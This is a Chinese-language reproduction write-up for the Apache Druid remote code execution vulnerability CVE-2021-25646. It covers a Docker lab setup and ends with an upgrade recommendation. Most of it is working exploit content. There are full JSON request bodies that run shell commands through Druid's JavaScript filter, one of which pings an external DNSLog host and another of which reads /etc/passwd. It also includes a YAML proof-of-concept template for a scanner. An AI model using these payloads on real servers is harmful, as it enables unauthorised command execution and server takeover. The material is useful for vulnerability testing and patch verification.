###Apache Druid远程命令执行漏洞复现(CVE-2021-25646)–xxlm
- 漏洞概述
Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器
影响版本
Apache Druid < 0.20.1
环境搭建
本次环境使用docker搭建,需要在虚拟机安装docker,安装完成后使用以下命令pull漏洞环境
docker pull fokkodriesprong/docker-druid
下载漏洞环境后使用以下命令启动漏洞环境
docker run –rm -i -p 8888:8888 fokkodriesprong/docker-druid
映射8888端口,启动后界面如下
漏洞复现
点击上方Load data -> Local disk:
右侧表单填入:
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
点击Preview
点击next,直到下一步是Filter时,抓取数据包:
此时替换数据包中POST的data数据
DNSLog测试
{
"type":"index",
"spec":{
"type":"index",
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"quickstart/tutorial/",
"filter":"wikiticker-2015-09-12-sampled.json.gz"
}
},
"dataSchema":{
"dataSource":"sample",
"parser":{
"type":"string",
"parseSpec":{
"format":"json",
"timestampSpec":{
"column":"time",
"format":"iso"
},
"dimensionsSpec":{
}
}
},
"transformSpec":{
"transforms":[
],
"filter":{
"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping nd7jre.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000,
"cacheKey":"4ddb48fdbad7406084e37a1b80100214"
}
}
提交数据报文
查询到dnslog日志记录
执行命令
提交报文
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"odgjxrrrePz",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
},
"dimensionsSpec":{
},
"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
poc 编写
name: ' apache-druid-rec-cve-2021-25646'
set:
r1: 'randomInt(800000000, 1000000000) '
r2: 'randomInt(800000000, 1000000000) '
rules:
- method: POST
path: /druid/indexer/v1/sampler?for=filter
headers:
Content-Type: application/json;charset=UTF-8
body: |-
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"odgjxrrrePz",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
},
"dimensionsSpec":{
},
"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~expr {{r1}} + {{r2}}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(r1+r2)))
groups: {}
detail:
author: "xxlm"
links: []
description: ""
version: ""
使用Tscan验证
加固建议
升级到最新版Apache Druid 0.20.1
请登录后查看回复内容